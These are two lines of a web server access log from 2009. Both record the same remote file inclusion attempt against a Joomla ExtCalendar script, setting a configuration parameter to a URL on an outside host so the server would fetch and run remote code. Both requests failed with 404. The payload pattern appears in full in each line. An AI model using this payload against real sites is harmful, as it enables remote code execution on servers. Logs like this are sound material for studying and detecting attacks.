92.50.143.90 - - [23/Sep/2009:20:24:24 -0500] "GET /logs/access_log.1237507200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
92.50.143.90 - - [23/Sep/2009:20:24:31 -0500] "GET /logs/access_log.1238371200/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sky-trading.com/board/data/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
